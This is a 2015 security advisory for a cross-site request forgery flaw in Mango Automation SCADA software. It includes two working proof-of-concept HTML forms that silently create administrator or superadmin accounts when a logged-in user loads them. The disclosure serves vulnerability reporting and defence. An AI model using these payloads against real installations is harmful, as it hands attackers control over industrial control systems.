Mango Automation 2.6.0 Add Admin Cross Site Request Forgery
Posted on 29 September 2015
Mango Automation 2.6.0 CSRF Add Admin Exploit Vendor: Infinite Automation Systems Inc. Product web page: http://www.infiniteautomation.com/ Affected version: 2.5.2 and 2.6.0 beta (build 327) Summary: Mango Automation is a flexible SCADA, HMI And Automation software application that allows you to view, log, graph, animate, alarm, and report on data from sensors, equipment, PLCs, databases, webpages, etc. It is easy, affordable, and open source. Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit Jetty(9.2.2.v20140723) Java(TM) SE Runtime Environment (build 1.8.0_51-b16) Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5258 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5258.php 20.08.2015 -- 2.5.2: <!-- user hacker, pass 123123 --> <html> <body> <form action="http://localhost:8080/dwr/call/plaincall/UsersDwr.saveUserAdmin.dwr" method="POST" enctype="text/plain"> <input type="hidden" name="callCount" value="1 page=/users.shtm httpSessionId= scriptSessionId=8BD64066486071219EB8691611D48F14109 c0-scriptName=UsersDwr c0-methodName=saveUserAdmin c0-id=0 c0-param0=number:-1 c0-param1=string:hacker c0-param2=string:123123 c0-param3=string:hacker%40hacker.hack c0-param4=string:111222333 c0-param5=boolean:true c0-param6=boolean:false c0-param7=string:0 c0-param8=boolean:false c0-param9=string: c0-param10=Array:[] c0-param11=Array:[] batchId=5 " /> <input type="submit" value="Submit request 1" /> </form> </body> </html> 2.6.0 beta (build 327): <!-- user hacker3, pass admin (in sha1(base64) hash value) --> <html> <body> <form action="http://localhost:8080/rest/v1/users.json" method="POST" enctype="text/plain"> <input type="hidden" name="{"username":"hacker3","password":"0DPiKuNIrrVmD8IUCuw1hQxNqZc" value="","email":"hacker@zeroscience.mk","phone":"111222333","muted":true,"disabled":false,"homeUrl":"http://www.zeroscience.mk","receiveAlarmEmails":"NONE","receiveOwnAuditEvents":false,"timezone":"","permissions":"user,superadmin"}" /> <input type="submit" value="Submit request 2" /> </form> </body> </html>
